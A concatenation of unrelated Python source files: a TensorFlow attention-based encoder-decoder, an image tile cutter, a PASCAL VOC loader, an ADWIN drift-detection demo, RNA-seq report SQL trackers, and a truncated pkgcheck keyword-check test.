idx = tf.tile(tf.to_float(tf.range(attn_length)), tf.stack([batch_size]))
idx = tf.reshape(idx, [-1, attn_length])
low = pos - encoder.attn_window_size
high = pos + encoder.attn_window_size
mlow = tf.to_float(idx < low)
mhigh = tf.to_float(idx > high)
m = mlow + mhigh
m += tf.to_float(idx >= encoder_input_length)
mask = tf.to_float(tf.equal(m, 0.0))
e = compute_energy(hidden_states, state, attn_size=encoder.attn_size, **kwargs)
weights = softmax(e, mask=mask)
sigma = encoder.attn_window_size / 2
numerator = -tf.pow((idx - pos), tf.convert_to_tensor(2, dtype=tf.float32))
div = tf.truediv(numerator, 2 * sigma ** 2)
weights *= tf.exp(div) # result of the truncated normal distribution
# normalize to keep a probability distribution
# weights /= (tf.reduce_sum(weights, axis=1, keep_dims=True) + 10e-12)
weighted_average = tf.reduce_sum(tf.expand_dims(weights, axis=2) * hidden_states, axis=1)
return weighted_average, weights
def attention(encoder, **kwargs):
attention_functions = {
'global': global_attention,
'local': local_attention,
'none': no_attention,
'average': average_attention,
'last_state': last_state_attention
}
attention_function = attention_functions.get(encoder.attention_type, global_attention)
return attention_function(encoder=encoder, **kwargs)
def multi_attention(state, hidden_states, encoders, encoder_input_length, pos=None, aggregation_method='sum',
prev_weights=None, **kwargs):
attns = []
weights = []
context_vector = None
for i, (hidden, encoder, input_length) in enumerate(zip(hidden_states, encoders, encoder_input_length)):
pos_ = pos[i] if pos is not None else None
prev_weights_ = prev_weights[i] if prev_weights is not None else None
hidden = beam_search.resize_like(hidden, state)
input_length = beam_search.resize_like(input_length, state)
context_vector, weights_ = attention(state=state, hidden_states=hidden, encoder=encoder,
encoder_input_length=input_length, pos=pos_, context=context_vector,
prev_weights=prev_weights_, **kwargs)
attns.append(context_vector)
weights.append(weights_)
if aggregation_method == 'sum':
context_vector = tf.reduce_sum(tf.stack(attns, axis=2), axis=2)
else:
context_vector = tf.concat(attns, axis=1)
return context_vector, weights
def attention_decoder(decoder_inputs, initial_state, attention_states, encoders, decoder, encoder_input_length,
feed_previous=0.0, align_encoder_id=0, feed_argmax=True, **kwargs):
"""
:param decoder_inputs: int32 tensor of shape (batch_size, output_length)
:param initial_state: initial state of the decoder (usually the final state of the encoder),
as a float32 tensor of shape (batch_size, initial_state_size). This state is mapped to the
correct state size for the decoder.
:param attention_states: list of tensors of shape (batch_size, input_length, encoder_cell_size),
the hidden states of the encoder(s) (one tensor for each encoder).
:param encoders: configuration of the encoders
:param decoder: configuration of the decoder
:param encoder_input_length: list of int32 tensors of shape (batch_size,), tells for each encoder,
the true length of each sequence in the batch (sequences in the same batch are padded to all have the same
length).
:param feed_previous: scalar tensor corresponding to the probability to use previous decoder output
instead of the ground truth as input for the decoder (1 when decoding, between 0 and 1 when training)
:param feed_argmax: boolean tensor, when True the greedy decoder outputs the word with the highest
probability (argmax). When False, it samples a word from the probability distribution (softmax).
:param align_encoder_id: outputs attention weights for this encoder. Also used when predicting edit operations
(pred_edits), to specifify which encoder reads the sequence to post-edit (MT).
:return:
outputs of the decoder as a tensor of shape (batch_size, output_length, decoder_cell_size)
attention weights as a tensor of shape (output_length, encoders, batch_size, input_length)
"""
assert not decoder.pred_maxout_layer or decoder.cell_size % 2 == 0, 'cell size must be a multiple of 2'
if decoder.use_lstm is False:
decoder.cell_type = 'GRU'
embedding_shape = [decoder.vocab_size, decoder.embedding_size]
if decoder.embedding_initializer == 'sqrt3':
initializer = tf.random_uniform_initializer(-math.sqrt(3), math.sqrt(3))
else:
initializer = None
device = '/cpu:0' if decoder.embeddings_on_cpu else None
with tf.device(device):
embedding = get_variable('embedding_{}'.format(decoder.name), shape=embedding_shape, initializer=initializer)
input_shape = tf.shape(decoder_inputs)
batch_size = input_shape[0]
time_steps = input_shape[1]
scope_name = 'decoder_{}'.format(decoder.name)
scope_name += '/' + '_'.join(encoder.name for encoder in encoders)
def embed(input_):
embedded_input = tf.nn.embedding_lookup(embedding, input_)
if decoder.use_dropout and decoder.word_keep_prob is not None:
noise_shape = [1, 1] if decoder.pervasive_dropout else [batch_size, 1]
embedded_input = tf.nn.dropout(embedded_input, keep_prob=decoder.word_keep_prob, noise_shape=noise_shape)
if decoder.use_dropout and decoder.embedding_keep_prob is not None:
size = tf.shape(embedded_input)[1]
noise_shape = [1, size] if decoder.pervasive_dropout else [batch_size, size]
embedded_input = tf.nn.dropout(embedded_input, keep_prob=decoder.embedding_keep_prob,
noise_shape=noise_shape)
return embedded_input
def get_cell(input_size=None, reuse=False):
cells = []
for j in range(decoder.layers):
input_size_ = input_size if j == 0 else decoder.cell_size
if decoder.cell_type.lower() == 'lstm':
cell = CellWrapper(BasicLSTMCell(decoder.cell_size, reuse=reuse))
elif decoder.cell_type.lower() == 'dropoutgru':
cell = DropoutGRUCell(decoder.cell_size, reuse=reuse, layer_norm=decoder.layer_norm,
input_size=input_size_, input_keep_prob=decoder.rnn_input_keep_prob,
state_keep_prob=decoder.rnn_state_keep_prob)
else:
cell = GRUCell(decoder.cell_size, reuse=reuse, layer_norm=decoder.layer_norm)
if decoder.use_dropout and decoder.cell_type.lower() != 'dropoutgru':
cell = DropoutWrapper(cell, input_keep_prob=decoder.rnn_input_keep_prob,
output_keep_prob=decoder.rnn_output_keep_prob,
state_keep_prob=decoder.rnn_state_keep_prob,
variational_recurrent=decoder.pervasive_dropout,
dtype=tf.float32, input_size=input_size_)
cells.append(cell)
if len(cells) == 1:
return cells[0]
else:
return CellWrapper(MultiRNNCell(cells))
def look(state, input_, prev_weights=None, pos=None):
prev_weights_ = [prev_weights if i == align_encoder_id else None for i in range(len(encoders))]
pos_ = None
if decoder.pred_edits:
pos_ = [pos if i == align_encoder_id else None for i in range(len(encoders))]
if decoder.attn_prev_word:
state = tf.concat([state, input_], axis=1)
parameters = dict(hidden_states=attention_states, encoder_input_length=encoder_input_length,
encoders=encoders, aggregation_method=decoder.aggregation_method)
context, new_weights = multi_attention(state, pos=pos_, prev_weights=prev_weights_, **parameters)
if decoder.context_mapping:
with tf.variable_scope(scope_name):
activation = tf.nn.tanh if decoder.context_mapping_activation == 'tanh' else None
use_bias = not decoder.context_mapping_no_bias
context = dense(context, decoder.context_mapping, use_bias=use_bias, activation=activation,
name='context_mapping')
return context, new_weights[align_encoder_id]
def update(state, input_, context=None, symbol=None):
if context is not None and decoder.rnn_feed_attn:
input_ = tf.concat([input_, context], axis=1)
input_size = input_.get_shape()[1].value
initializer = CellInitializer(decoder.cell_size) if decoder.orthogonal_init else None
with tf.variable_scope(tf.get_variable_scope(), initializer=initializer):
try:
output, new_state = get_cell(input_size)(input_, state)
except ValueError: # auto_reuse doesn't work with LSTM cells
output, new_state = get_cell(input_size, reuse=True)(input_, state)
if decoder.skip_update and decoder.pred_edits and symbol is not None:
is_del = tf.equal(symbol, utils.DEL_ID)
new_state = tf.where(is_del, state, new_state)
if decoder.cell_type.lower() == 'lstm' and decoder.use_lstm_full_state:
output = new_state
return output, new_state
def update_pos(pos, symbol, max_pos=None):
if not decoder.pred_edits:
return pos
is_keep = tf.equal(symbol, utils.KEEP_ID)
is_del = tf.equal(symbol, utils.DEL_ID)
is_not_ins = tf.logical_or(is_keep, is_del)
pos = beam_search.resize_like(pos, symbol)
max_pos = beam_search.resize_like(max_pos, symbol)
pos += tf.to_float(is_not_ins)
if max_pos is not None:
pos = tf.minimum(pos, tf.to_float(max_pos))
return pos
def generate(state, input_, context):
if decoder.pred_use_lstm_state is False: # for back-compatibility
state = state[:,-decoder.cell_size:]
projection_input = [state, context]
if decoder.use_previous_word:
projection_input.insert(1, input_) # for back-compatibility
output_ = tf.concat(projection_input, axis=1)
if decoder.pred_deep_layer:
deep_layer_size = decoder.pred_deep_layer_size or decoder.embedding_size
if decoder.layer_norm:
output_ = dense(output_, deep_layer_size, use_bias=False, name='deep_output')
output_ = tf.contrib.layers.layer_norm(output_, activation_fn=tf.nn.tanh, scope='output_layer_norm')
else:
output_ = dense(output_, deep_layer_size, activation=tf.tanh, use_bias=True, name='deep_output')
if decoder.use_dropout:
size = tf.shape(output_)[1]
noise_shape = [1, size] if decoder.pervasive_dropout else None
output_ = tf.nn.dropout(output_, keep_prob=decoder.deep_layer_keep_prob, noise_shape=noise_shape)
else:
if decoder.pred_maxout_layer:
maxout_size = decoder.maxout_size or decoder.cell_size
output_ = dense(output_, maxout_size, use_bias=True, name='maxout')
if decoder.old_maxout: # for back-compatibility with old models
output_ = tf.nn.pool(tf.expand_dims(output_, axis=2), window_shape=[2], pooling_type='MAX',
padding='SAME', strides=[2])
output_ = tf.squeeze(output_, axis=2)
else:
output_ = tf.maximum(*tf.split(output_, num_or_size_splits=2, axis=1))
if decoder.pred_embed_proj:
# intermediate projection to embedding size (before projecting to vocabulary size)
# this is useful to reduce the number of parameters, and
# to use the output embeddings for output projection (tie_embeddings parameter)
output_ = dense(output_, decoder.embedding_size, use_bias=False, name='softmax0')
if decoder.tie_embeddings and (decoder.pred_embed_proj or decoder.pred_deep_layer):
bias = get_variable('softmax1/bias', shape=[decoder.vocab_size])
output_ = tf.matmul(output_, tf.transpose(embedding)) + bias
else:
output_ = dense(output_, decoder.vocab_size, use_bias=True, name='softmax1')
return output_
state_size = (decoder.cell_size * 2 if decoder.cell_type.lower() == 'lstm' else decoder.cell_size) * decoder.layers
if decoder.use_dropout:
initial_state = tf.nn.dropout(initial_state, keep_prob=decoder.initial_state_keep_prob)
with tf.variable_scope(scope_name):
if decoder.layer_norm:
initial_state = dense(initial_state, state_size, use_bias=False, name='initial_state_projection')
initial_state = tf.contrib.layers.layer_norm(initial_state, activation_fn=tf.nn.tanh,
scope='initial_state_layer_norm')
else:
initial_state = dense(initial_state, state_size, use_bias=True, name='initial_state_projection',
activation=tf.nn.tanh)
if decoder.cell_type.lower() == 'lstm' and decoder.use_lstm_full_state:
initial_output = initial_state
else:
initial_output = initial_state[:, -decoder.cell_size:]
time = tf.constant(0, dtype=tf.int32, name='time')
outputs = tf.TensorArray(dtype=tf.float32, size=time_steps)
samples = tf.TensorArray(dtype=tf.int64, size=time_steps)
inputs = tf.TensorArray(dtype=tf.int64, size=time_steps).unstack(tf.to_int64(tf.transpose(decoder_inputs)))
states = tf.TensorArray(dtype=tf.float32, size=time_steps)
weights = tf.TensorArray(dtype=tf.float32, size=time_steps)
attns = tf.TensorArray(dtype=tf.float32, size=time_steps)
initial_symbol = inputs.read(0) # first symbol is BOS
initial_input = embed(initial_symbol)
initial_pos = tf.zeros([batch_size], tf.float32)
initial_weights = tf.zeros(tf.shape(attention_states[align_encoder_id])[:2])
initial_context, _ = look(initial_output, initial_input, pos=initial_pos, prev_weights=initial_weights)
initial_data = tf.concat([initial_state, initial_context, tf.expand_dims(initial_pos, axis=1), initial_weights],
axis=1)
context_size = initial_context.shape[1].value
def get_logits(state, ids, time): # for beam-search decoding
with tf.variable_scope('decoder_{}'.format(decoder.name)):
state, context, pos, prev_weights = tf.split(state, [state_size, context_size, 1, -1], axis=1)
input_ = embed(ids)
pos = tf.squeeze(pos, axis=1)
pos = tf.cond(tf.equal(time, 0),
lambda: pos,
lambda: update_pos(pos, ids, encoder_input_length[align_encoder_id]))
if decoder.cell_type.lower() == 'lstm' and decoder.use_lstm_full_state:
output = state
else:
# output is always the right-most part of state. However, this only works at test time,
# because different dropout operations can be used on state and output.
output = state[:, -decoder.cell_size:]
if decoder.conditional_rnn:
with tf.variable_scope('conditional_1'):
output, state = update(state, input_)
elif decoder.update_first:
output, state = update(state, input_, None, ids)
elif decoder.generate_first:
output, state = tf.cond(tf.equal(time, 0),
lambda: (output, state),
lambda: update(state, input_, context, ids))
context, new_weights = look(output, input_, pos=pos, prev_weights=prev_weights)
if decoder.conditional_rnn:
with tf.variable_scope('conditional_2'):
output, state = update(state, context)
elif not decoder.generate_first:
output, state = update(state, input_, context, ids)
logits = generate(output, input_, context)
pos = tf.expand_dims(pos, axis=1)
state = tf.concat([state, context, pos, new_weights], axis=1)
return state, logits
def _time_step(time, input_, input_symbol, pos, state, output, outputs, states, weights, attns, prev_weights,
samples):
if decoder.conditional_rnn:
with tf.variable_scope('conditional_1'):
output, state = update(state, input_)
elif decoder.update_first:
output, state = update(state, input_, None, input_symbol)
context, new_weights = look(output, input_, pos=pos, prev_weights=prev_weights)
if decoder.conditional_rnn:
with tf.variable_scope('conditional_2'):
output, state = update(state, context)
elif not decoder.generate_first:
output, state = update(state, input_, context, input_symbol)
output_ = generate(output, input_, context)
argmax = lambda: tf.argmax(output_, 1)
target = lambda: inputs.read(time + 1)
softmax = lambda: tf.squeeze(tf.multinomial(tf.log(tf.nn.softmax(output_)), num_samples=1),
axis=1)
use_target = tf.logical_and(time < time_steps - 1, tf.random_uniform([]) >= feed_previous)
predicted_symbol = tf.case([
(use_target, target),
(tf.logical_not(feed_argmax), softmax)],
default=argmax) # default case is useful for beam-search
predicted_symbol.set_shape([None])
predicted_symbol = tf.stop_gradient(predicted_symbol)
samples = samples.write(time, predicted_symbol)
input_ = embed(predicted_symbol)
pos = update_pos(pos, predicted_symbol, encoder_input_length[align_encoder_id])
attns = attns.write(time, context)
weights = weights.write(time, new_weights)
states = states.write(time, state)
outputs = outputs.write(time, output_)
if not decoder.conditional_rnn and not decoder.update_first and decoder.generate_first:
output, state = update(state, input_, context, predicted_symbol)
return (time + 1, input_, predicted_symbol, pos, state, output, outputs, states, weights, attns, new_weights,
samples)
with tf.variable_scope('decoder_{}'.format(decoder.name)):
_, _, _, new_pos, new_state, _, outputs, states, weights, attns, new_weights, samples = tf.while_loop(
cond=lambda time, *_: time < time_steps,
body=_time_step,
loop_vars=(time, initial_input, initial_symbol, initial_pos, initial_state, initial_output, outputs,
weights, states, attns, initial_weights, samples),
parallel_iterations=decoder.parallel_iterations,
swap_memory=decoder.swap_memory)
outputs = outputs.stack()
weights = weights.stack() # batch_size, encoders, output time, input time
states = states.stack()
attns = attns.stack()
samples = samples.stack()
# put batch_size as first dimension
outputs = tf.transpose(outputs, perm=(1, 0, 2))
weights = tf.transpose(weights, perm=(1, 0, 2))
states = tf.transpose(states, perm=(1, 0, 2))
attns = tf.transpose(attns, perm=(1, 0, 2))
samples = tf.transpose(samples)
return outputs, weights, states, attns, samples, get_logits, initial_data
def encoder_decoder(encoders, decoders, encoder_inputs, targets, feed_previous, align_encoder_id=0,
encoder_input_length=None, feed_argmax=True, **kwargs):
decoder = decoders[0]
targets = targets[0] # single decoder
if encoder_input_length is None:
encoder_input_length = []
for encoder_inputs_ in encoder_inputs:
weights = get_weights(encoder_inputs_, utils.EOS_ID, include_first_eos=True)
encoder_input_length.append(tf.to_int32(tf.reduce_sum(weights, axis=1)))
parameters = dict(encoders=encoders, decoder=decoder, encoder_inputs=encoder_inputs,
feed_argmax=feed_argmax)
target_weights = get_weights(targets[:, 1:], utils.EOS_ID, include_first_eos=True)
attention_states, encoder_state, encoder_input_length = multi_encoder(
encoder_input_length=encoder_input_length, **parameters)
outputs, attention_weights, _, _, samples, beam_fun, initial_data = attention_decoder(
attention_states=attention_states, initial_state=encoder_state, feed_previous=feed_previous,
decoder_inputs=targets[:, :-1], align_encoder_id=align_encoder_id, encoder_input_length=encoder_input_length,
**parameters
)
xent_loss = sequence_loss(logits=outputs, targets=targets[:, 1:], weights=target_weights)
losses = xent_loss
return losses, [outputs], encoder_state, attention_states, attention_weights, samples, beam_fun, initial_data
def chained_encoder_decoder(encoders, decoders, encoder_inputs, targets, feed_previous,
chaining_strategy=None, align_encoder_id=0, chaining_non_linearity=False,
chaining_loss_ratio=1.0, chaining_stop_gradient=False, **kwargs):
decoder = decoders[0]
targets = targets[0] # single decoder
assert len(encoders) == 2
encoder_input_length = []
input_weights = []
for encoder_inputs_ in encoder_inputs:
weights = get_weights(encoder_inputs_, utils.EOS_ID, include_first_eos=True)
input_weights.append(weights)
encoder_input_length.append(tf.to_int32(tf.reduce_sum(weights, axis=1)))
target_weights = get_weights(targets[:, 1:], utils.EOS_ID, include_first_eos=True)
parameters = dict(encoders=encoders[1:], decoder=encoders[0])
attention_states, encoder_state, encoder_input_length[1:] = multi_encoder(
encoder_inputs[1:], encoder_input_length=encoder_input_length[1:], **parameters)
decoder_inputs = encoder_inputs[0][:, :-1]
batch_size = tf.shape(decoder_inputs)[0]
pad = tf.ones(shape=tf.stack([batch_size, 1]), dtype=tf.int32) * utils.BOS_ID
decoder_inputs = tf.concat([pad, decoder_inputs], axis=1)
outputs, _, states, attns, _, _, _ = attention_decoder(
attention_states=attention_states, initial_state=encoder_state, decoder_inputs=decoder_inputs,
encoder_input_length=encoder_input_length[1:], **parameters
)
chaining_loss = sequence_loss(logits=outputs, targets=encoder_inputs[0], weights=input_weights[0])
if decoder.cell_type.lower() == 'lstm':
size = states.get_shape()[2].value
decoder_outputs = states[:, :, size // 2:]
else:
decoder_outputs = states
if chaining_strategy == 'share_states':
other_inputs = states
elif chaining_strategy == 'share_outputs':
other_inputs = decoder_outputs
else:
other_inputs = None
if other_inputs is not None and chaining_stop_gradient:
other_inputs = tf.stop_gradient(other_inputs)
parameters = dict(encoders=encoders[:1], decoder=decoder, encoder_inputs=encoder_inputs[:1],
other_inputs=other_inputs)
attention_states, encoder_state, encoder_input_length[:1] = multi_encoder(
encoder_input_length=encoder_input_length[:1], **parameters)
if chaining_stop_gradient:
attns = tf.stop_gradient(attns)
states = tf.stop_gradient(states)
decoder_outputs = tf.stop_gradient(decoder_outputs)
if chaining_strategy == 'concat_attns':
attention_states[0] = tf.concat([attention_states[0], attns], axis=2)
elif chaining_strategy == 'concat_states':
attention_states[0] = tf.concat([attention_states[0], states], axis=2)
elif chaining_strategy == 'sum_attns':
attention_states[0] += attns
elif chaining_strategy in ('map_attns', 'map_states', 'map_outputs'):
if chaining_strategy == 'map_attns':
x = attns
elif chaining_strategy == 'map_outputs':
x = decoder_outputs
else:
x = states
shape = [x.get_shape()[-1], attention_states[0].get_shape()[-1]]
w = tf.get_variable("map_attns/matrix", shape=shape)
b = tf.get_variable("map_attns/bias", shape=shape[-1:])
x = tf.einsum('ijk,kl->ijl', x, w) + b
if chaining_non_linearity:
x = tf.nn.tanh(x)
attention_states[0] += x
outputs, attention_weights, _, _, samples, beam_fun, initial_data = attention_decoder(
attention_states=attention_states, initial_state=encoder_state,
feed_previous=feed_previous, decoder_inputs=targets[:,:-1],
align_encoder_id=align_encoder_id, encoder_input_length=encoder_input_length[:1],
**parameters
)
xent_loss = sequence_loss(logits=outputs, targets=targets[:, 1:],
weights=target_weights)
if chaining_loss is not None and chaining_loss_ratio:
xent_loss += chaining_loss_ratio * chaining_loss
losses = [xent_loss, None, None]
return losses, [outputs], encoder_state, attention_states, attention_weights, samples, beam_fun, initial_data
def softmax(logits, dim=-1, mask=None):
e = tf.exp(logits)
if mask is not None:
e *= mask
return e / tf.clip_by_value(tf.reduce_sum(e, axis=dim, keep_dims=True), 10e-37, 10e+37)
def sequence_loss(logits, targets, weights, average_across_timesteps=False, average_across_batch=True):
batch_size = tf.shape(targets)[0]
time_steps = tf.shape(targets)[1]
logits_ = tf.reshape(logits, tf.stack([time_steps * batch_size, logits.get_shape()[2].value]))
targets_ = tf.reshape(targets, tf.stack([time_steps * batch_size]))
crossent = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits_, labels=targets_)
crossent = tf.reshape(crossent, tf.stack([batch_size, time_steps]))
log_perp = tf.reduce_sum(crossent * weights, axis=1)
if average_across_timesteps:
total_size = tf.reduce_sum(weights, axis=1)
total_size += 1e-12 # just to avoid division by 0 for all-0 weights
log_perp /= total_size
cost = tf.reduce_sum(log_perp)
if average_across_batch:
return cost / tf.to_float(batch_size)
else:
return cost
def get_weights(sequence, eos_id, include_first_eos=True):
cumsum = tf.cumsum(tf.to_float(tf.not_equal(sequence, eos_id)), axis=1)
range_ = tf.range(start=1, limit=tf.shape(sequence)[1] + 1)
range_ = tf.tile(tf.expand_dims(range_, axis=0), [tf.shape(sequence)[0], 1])
weights = tf.to_float(tf.equal(cumsum, tf.to_float(range_)))
if include_first_eos:
weights = weights[:,:-1]
shape = [tf.shape(weights)[0], 1]
weights = tf.concat([tf.ones(tf.stack(shape)), weights], axis=1)
return tf.stop_gradient(weights)
|
65838
|
import math, time, os, argparse, logging, json
from wand.image import Image
parser = argparse.ArgumentParser(
prog='tile_cutter',
description='Cuts large images into tiles.')
parser.add_argument('--tile-size', metavar='SIZE', type=int, default=512,
help='Tile size (width and height)')
parser.add_argument('-v', '--verbose', action='store_true',
help='Log debugging information')
parser.add_argument('image', type=argparse.FileType('rb'),
help='Source image')
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
layers = []
tile_size = args.tile_size
logging.info("tile size: %dx%d", tile_size, tile_size)
with Image(file=args.image) as source:
logging.info("image size: %dx%d", source.width, source.height)
# every zoom level has 2x more tiles
max_zoom = math.ceil(math.log(max(source.size) / args.tile_size, 2))
logging.info("zoom levels: 1-%d", max_zoom)
image_size = args.tile_size * (2 ** max_zoom)
offset_x, offset_y = tuple((image_size - orig) // 2 for orig in source.size)
logging.info("tiled size: %dx%d-%d-%d", image_size, image_size, offset_x, offset_y)
layers.append({
"name": "???",
"URL": os.path.basename(args.image.name),
"width": source.width,
"height": source.height,
"tileSize": args.tile_size,
"imageSize": image_size
})
square_source = Image(width=image_size, height=image_size)
square_source.composite(source,
(square_source.width - source.width) // 2,
(square_source.height - source.height) // 2)
for z in range(1, max_zoom + 1):
source_size = int(args.tile_size * (2 ** (max_zoom - z)))
logging.info("zoom level %d: source %dx%d", z, source_size, source_size)
current_image = 0
total_images = (image_size // source_size) ** 2
start_time = last_report_time = time.clock()
for y in range(0, image_size // source_size):
for x in range(0, image_size // source_size):
crop_x, crop_y = x * source_size, y * source_size
path = "%s-tiles/%d/%d/%d.png" % (args.image.name, z, x, y)
logging.debug("tile %s: source %dx%d%+d%+d",
path, source_size, source_size, crop_x, crop_y)
with square_source.clone() as tile:
tile.crop(crop_x, crop_y, width=source_size, height=source_size)
tile.resize(tile_size, tile_size)
os.makedirs(os.path.dirname(path), exist_ok=True)
tile.save(filename=path)
current_image += 1
if time.clock() - last_report_time > 1:
last_report_time = time.clock()
eta = (last_report_time - start_time) / current_image * \
(total_images - current_image)
logging.info("completion: %.2f%% (ETA: %dh%dm%ds)",
current_image / total_images * 100,
eta // 3600, (eta % 3600) // 60, eta % 60)
with open("%s.json" % args.image.name, "w") as descr:
descr.write(json.dumps({
"name": "???",
"scale": None,
"layers": layers
}))
logging.info("image description written to: %s" % descr.name)
logging.info("done")
|
65845
|
import logging
import os
import numpy as np
import xml.etree.ElementTree as ET
from PIL import Image
from paths import DATASETS_ROOT
log = logging.getLogger()
VOC_CATS = ['__background__', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle',
'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse',
'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train',
'tvmonitor']
class VOCLoader():
def __init__(self, year, split, segmentation=False, augmented_seg=False):
assert year in ['07', '12']
self.dataset = 'voc'
self.year = year
self.root = os.path.join(DATASETS_ROOT, 'VOCdevkit/VOC20%s/' % year)
self.split = split
assert split in ['train', 'val', 'trainval', 'test']
cats = VOC_CATS
self.cats_to_ids = dict(map(reversed, enumerate(cats)))
self.ids_to_cats = dict(enumerate(cats))
self.num_classes = len(cats)
self.categories = cats[1:]
self.segmentation = segmentation
self.augmented_seg = augmented_seg
assert not self.segmentation or self.segmentation and self.year == '12'
if self.augmented_seg:
filelist = 'ImageSets/SegmentationAug/%s.txt'
elif self.segmentation:
filelist = 'ImageSets/Segmentation/%s.txt'
else:
filelist = 'ImageSets/Main/%s.txt'
with open(os.path.join(self.root, filelist % self.split), 'r') as f:
self.filenames = f.read().split('\n')[:-1]
log.info("Created a loader VOC%s %s with %i images" % (year, split, len(self.filenames)))
def load_image(self, name):
im = Image.open('%sJPEGImages/%s.jpg' % (self.root, name)).convert('RGB')
im = np.array(im) / 255.0
im = im.astype(np.float32)
return im
def get_filenames(self):
return self.filenames
def read_annotations(self, name):
bboxes = []
cats = []
tree = ET.parse('%sAnnotations/%s.xml' % (self.root, name))
root = tree.getroot()
width = int(root.find('size/width').text)
height = int(root.find('size/height').text)
difficulty = []
for obj in root.findall('object'):
cat = self.cats_to_ids[obj.find('name').text]
difficult = (int(obj.find('difficult').text) != 0)
difficulty.append(difficult)
cats.append(cat)
bbox_tag = obj.find('bndbox')
x = int(bbox_tag.find('xmin').text)
y = int(bbox_tag.find('ymin').text)
w = int(bbox_tag.find('xmax').text)-x
h = int(bbox_tag.find('ymax').text)-y
bboxes.append((x, y, w, h))
gt_cats = np.array(cats)
gt_bboxes = np.array(bboxes).reshape((len(bboxes), 4))
difficulty = np.array(difficulty)
seg_gt = self.read_segmentations(name, height, width)
output = gt_bboxes, seg_gt, gt_cats, width, height, difficulty
return output
def read_segmentations(self, name, height, width):
if self.segmentation:
try:
seg_folder = self.root + 'SegmentationClass/'
seg_file = seg_folder + name + '.png'
seg_map = Image.open(seg_file)
except:
assert self.augmented_seg
seg_folder = self.root + 'SegmentationClassAug/'
seg_file = seg_folder + name + '.png'
seg_map = Image.open(seg_file)
segmentation = np.array(seg_map, dtype=np.uint8)
else:
# if there is no segmentation for a particular image we fill the mask
# with zeros to keep the same amount of tensors but don't learn from it
segmentation = np.zeros([height, width], dtype=np.uint8) + 255
return segmentation
|
65846
|
import numpy as np
from skmultiflow.drift_detection import ADWIN
def demo():
""" _test_adwin
In this demo, an ADWIN object evaluates a sequence of numbers corresponding to 2 distributions.
The ADWIN object indicates the indices where change is detected.
The first half of the data is a sequence of randomly generated 0's and 1's.
The second half of the data is a normal distribution of integers from 0 to 7.
"""
adwin = ADWIN()
size = 2000
change_start = 999
np.random.seed(1)
data_stream = np.random.randint(2, size=size)
data_stream[change_start:] = np.random.randint(8, size=size-change_start)
for i in range(size):
adwin.add_element(data_stream[i])
if adwin.detected_change():
print('Change has been detected in data: ' + str(data_stream[i]) + ' - of index: ' + str(i))
if __name__ == '__main__':
demo()
|
65874
|
from RnaseqDiffExpressionReport import ProjectTracker
from RnaseqDiffExpressionReport import linkToEnsembl, linkToUCSC
class TopDifferentiallyExpressedGenes(ProjectTracker):
'''output differentially expressed genes.'''
limit = 10
pattern = '(.*)_gene_diff'
sort = ''
def __call__(self, track, slice=None):
statement = '''SELECT DISTINCT a.gene_name,
a.gene_id,
a.gene_biotype,
t.l2fold,
t.treatment_mean,
t.control_mean,
t.pvalue,
t.qvalue,
s.contig, s.start, s.end
FROM %(track)s_gene_diff as t,
annotations.transcript_info as a,
annotations.gene_stats as s
WHERE a.gene_id = t.test_id AND
s.gene_id = t.test_id AND
t.significant
ORDER BY %(sort)s
LIMIT %(limit)i'''
data = self.getAll(statement)
if data:
data['gene_id'] = [linkToEnsembl(x) for x in data["gene_id"]]
data["locus"] = [linkToUCSC(*x) for x in zip(
data["contig"],
data["start"],
data["end"])]
return data
statement = '''SELECT DISTINCT t.test_id,
t.l2fold,
t.treatment_mean,
t.control_mean,
t.pvalue,
t.qvalue
FROM %(track)s_gene_diff as t
WHERE
t.significant
ORDER BY %(sort)s
LIMIT %(limit)i'''
return self.getAll(statement)
class TopUpRegulatedGenes(TopDifferentiallyExpressedGenes):
sort = 't.l2fold DESC'
class TopDownRegulatedGenes(TopDifferentiallyExpressedGenes):
sort = 't.l2fold Asc'
class AllDifferentiallyExpressedGenes(ProjectTracker):
'''output differentially expressed genes.'''
limit = 1000
pattern = '(.*)_gene_diff'
def __call__(self, track, slice=None):
statement = '''SELECT DISTINCT a.gene_name,
a.gene_id,
a.gene_biotype,
t.l2fold,
t.treatment_mean,
t.control_mean,
t.pvalue,
t.qvalue,
s.contig, s.start, s.end
FROM %(track)s_gene_diff as t,
annotations.transcript_info as a,
annotations.gene_stats as s
WHERE a.gene_id = t.test_id AND
s.gene_id = t.test_id AND
t.significant
ORDER BY t.l2fold DESC LIMIT %(limit)i'''
data = self.getAll(statement)
if data:
data['gene_id'] = [linkToEnsembl(x) for x in data["gene_id"]]
data["locus"] = [linkToUCSC(*x) for x in zip(
data["contig"],
data["start"],
data["end"])]
return data
statement = '''SELECT DISTINCT t.test_id,
t.l2fold,
t.treatment_mean,
t.control_mean,
t.pvalue,
t.qvalue
FROM %(track)s_gene_diff as t
WHERE
t.significant
ORDER BY t.l2fold DESC LIMIT %(limit)i'''
return self.getAll(statement)
|
65892
|
from pkgcheck.checks import dropped_keywords
from snakeoil.cli import arghparse
from .. import misc
class TestDroppedKeywords(misc.ReportTestCase):
check_kls = dropped_keywords.DroppedKeywordsCheck
def mk_pkg(self, ver, keywords='', eclasses=(), **kwargs):
return misc.FakePkg(
f"dev-util/diffball-{ver}",
data={
**kwargs,
"KEYWORDS": keywords,
"_eclasses_": eclasses,
})
def mk_check(self, arches=('x86', 'amd64'), verbosity=0):
options = arghparse.Namespace(arches=arches, verbosity=verbosity)
return self.check_kls(options, arches_addon=None)
def test_it(self):
# single version, shouldn't yield.
check = self.mk_check()
self.assertNoReport(check, [self.mk_pkg('1')])
# ebuilds without keywords are skipped
self.assertNoReport(
check, [self.mk_pkg("1", "x86 amd64"), self.mk_pkg("2")])
# ensure it limits itself to just the arches we care about
# check unstable at the same time;
# finally, check '-' handling; if x86 -> -x86, that's valid.
self.assertNoReport(
check,
[self.mk_pkg("1", "x86 ~amd64 ppc"),
self.mk_pkg("2", "~amd64 x86"),
self.mk_pkg("3", "-amd64 x86")])
# check added keyword handling
self.assertNoReport(
check,
[self.mk_pkg("1", "amd64"),
self.mk_pkg("2", "x86"),
self.mk_pkg("3", "~x86 ~amd64")])
# check special keyword handling
for key in ('-*', '*', '~*'):
self.assertNoReport(
check,
